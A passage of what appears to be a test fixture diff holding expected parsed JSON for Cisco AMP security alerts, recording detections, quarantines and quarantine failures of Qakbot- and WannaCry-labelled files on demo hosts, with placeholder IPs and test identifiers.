"host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + 
"log.offset": 3794, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626319", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 4969, + "process.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "process.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "QuotaGroup.exe", + "process.pid": 7120, + 
"related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "QuotaGroup.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6511, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], 
+ "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626317", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7890, + "process.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "process.name": "28242311.exe", + "process.pid": 4788, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.E4FCCBFA69-95.SBX.TG", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 478000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b5ede95ec8bc4ad6984758be42b152bd", + "file.hash.sha1": "f504774b72acfb23a46217aec9c6559fd7e4df64", + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "file.name": "28242311.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9339, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "b5ede95ec8bc4ad6984758be42b152bd", + "f504774b72acfb23a46217aec9c6559fd7e4df64" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + 
"forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626318", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 587000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 10708, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T20:18:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6412680266518626316", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + 
"cisco.amp.timestamp_nanoseconds": 494000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6412680266518626000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 11817, + "related.hash": [ + "e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12926, + 
"related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14119, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526295", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15312, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526294", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 
"cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16498, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526293", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + 
"log.offset": 17684, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526292", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18870, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526291", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 20056, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526288", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 
"cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21242, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526287", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + 
"log.offset": 22428, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526286", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 23614, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558988", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 24800, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558989", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 
"cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25986, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 